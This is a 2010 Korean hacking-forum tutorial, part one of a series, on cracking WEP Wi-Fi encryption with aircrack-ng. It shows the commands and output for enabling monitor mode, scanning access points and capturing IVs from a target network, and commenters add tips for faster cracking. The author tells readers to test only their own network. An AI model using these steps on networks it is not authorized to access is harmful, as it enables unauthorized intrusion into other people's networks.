1580, 2/79 회원가입  로그인  
   kjwon15
   http://kjwon15.comoj.com
   [자작] 무선랜 WEP 보안을 뚫어보자.<1>

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1422 [복사]


일단 주의사항 :
이 방법으로 자신의 것만 실험하시기를 바랍니다.
그리고 암호가 복잡하면 오래걸리니 일단 123456789a로 실험합니다.

준비물 :
aircrack-ng
airodump-ng
aireplay-ng
airmon-ng
(모두 sudo apt-get install aircrack-ng 를 통해 한번에 설치 가능합니다.)

1. airmon-ng 를 이용해서 무선랜 카드를 모니터모드로 변경하기.

자신의 랜카드 (전 wlan0입니다.)를 무선랜 모드로 변경하기 위해서 다음을 입력합니다.
airmon-ng start wlan0

그럼 다음과 같이 나옵니다.(사람에 따라 조금씩은 다르게 나옵니다.)
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID        Name
976        NetworkManager
1038        wpa_supplicant
1040        dhclient


Interface        Chipset                Driver

wlan0                Unknown         rt2800usb - [phy0]
                                (monitor mode enabled on mon0)

네 mon0에 모니터모드가 ㄷㅚㅆ다고 하는군요..

2. airodump-ng 로 무선 AP를 검색하기.

airodump-ng mon0
을 입력합니다.

그러면 목록이 쭉 나열됩니다.
전 다음과 같이 나오네요
CH 11 ][ Elapsed: 3 mins ][ 2010-03-04 08:33                                        
                                                                                        
BSSID              PWR  Beacons #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID        
                                                                                        
00:01:36:37:38:9B   34    3     0    0   3  54e  WPA  TKIP   PSK  <length: 17>  
00:01:36:37:38:9C   33    1     0    0   3  54e  WEP  WEP         myLGNet<= 이게 제가 뚫을 것입니다.
78:28:03:0D:83:88   37       36        0    0   4  54e  WPA  CCMP   PSK  son_wir      
                                                                                        
BSSID              STATION            PWR   Rate    Lost  Packets  Probes              
                                                                                        
00:01:36:37:38:9C  00:23:06:F5:42:05   20    0 - 1     18     1070  myLGNet            
(not associated)   00:21:6A:49:BC:1C   36    0 - 1      0        3                      
(not associated)   00:26:66:03:85:1E    0    0 - 1      0       22                      

3. airodump-ng 를 또 이용해 IVs수집하기
다음과 같이 입력합니다.
airodump-ng -w <저장할 파일명> --bssid <BSSID> -c <채널> <디바이스>
그러므로 저는
airodump-ng -w pass --bssid 00:01:36:37:38:9C -c 3 mon0
이 됩니다.
그러면 다음과 같이 뜹니다.
CH  3 ][ Elapsed: 1 min ][ 2010-03-04 08:38                                        
                                                                                        
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID    
                                                                                        
00:01:36:37:38:9C   -1   0        0        0    0 118  -1                    myLGNet  
                                                                                        
BSSID              STATION            PWR   Rate    Lost  Packets  Probes              
                                                                                        
00:01:36:37:38:9C  00:23:06:F5:42:05   14    0 - 1      0      840  

여기서 DATA부분이 5000이상이 될 때까지 기다립니다.

  Hit : 22305     Date : 2010/03/04 08:30



    
별빛을담아 저 모든 준비물은 백트랙 리눅스에 있지요...

그리고 airodump에서
airodump-ng -w pass --bssid 00:01:36:37:38:9C -c 3 mon0
이걸
airodump-ng --bssid 00:01:36:37:38:9C -c 3 --output-format ivs -w pass mon0

요렇게 바꾸시면 ivs만 쭉쭉 모입니다
그렇게 되면 aircrack-ng 과정에서 좀 더 빨리 크랙됩니다.
2010/03/04  
별빛을담아 --output-format 파라메터가 삽입되지 않으면

#data부분의 수치와 ivs의 수치가 일치하지 않게 됩니다.
2010/03/04  
싫어 내가할꺼야 ㄷㅚㅆ 2010/03/05  
soohosin 집에 AP가 몇개 있는데, 하나씩 해봐야겠어요.
그런데, Ubuntu 만 되나 봐요. 이런 ...
우분트 씁시다!
2010/03/06  
Cpgroot 감사합니다. 2010/08/18  
leedoott 저기 쓰인 랜카드 확인은 어떻게 하나요...ㅠㅠ 2010/08/27  
1560   sdsdfdfgfh[4]     witched14
11/06 35301
1559   텔넷이안되 이상하게뜸[2]     dygks3157
09/02 35139
1558   리눅스 명령어 마스터 1[78]     소유
09/02 34367
1557   초보자를 위한 C++ 강좌 - 씹어먹는 C++ !![2]     kevin0960
03/06 32027
1556     [re] 텔넷이안되 이상하게뜸[1]     enrjfenrjf
05/10 31428
1555   리눅스의 거의 모든 명령어?[314]     소유
10/05 30969
1554   각 라우터 디폴트 비번     ROK.AF
02/09 28857
1553   패스워드 알아내기 2[17]     geniusevil
12/18 26193
1552   batch파일 만들기 - 1. 초보 연습[2]     qkreoghks00
11/18 25923
1551   [War Game] webhacking.kr 가입을해보자.[12]     푸른하늘
03/06 25620
1550   웹 게시판들의 웹실행파일 업로드 취약점(파일명 필터링 우회)[19]     dual5651
03/28 24553
1549   find 명령어중 -perm 옵션에서 -,+의 차이[1]     파란바다
08/04 24010
1548   해킹 관련 사이트 목록입니다.[12]     wlwjsan
11/09 23673
1547   왜 C 이어야 하는가 ?[96]     소유
04/09 23417
1546   [펌]리눅스에서 Apache2, Tomcat5, JSP, Oracle9i 연동하기[1]     shin3199
05/30 22772
1545   자바가상머신 JVM 메모리 조정하기[1]     rootguy
12/05 22461
  [자작] 무선랜 WEP 보안을 뚫어보자.<1>[6]     kjwon15
03/04 22304
1543   ftz 서버 구축해보기[15]     파란바다
09/10 21797
1542   [자작] 자동해킹 USB에 대해서[4]     namjmnam
11/21 21371
1541   리눅스 명령어 마스터 2[27]     소유
09/03 21023
[1] 2 [3][4][5][6][7][8][9][10]..[79]

Copyright 1999-2023 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org & Wowhacker.com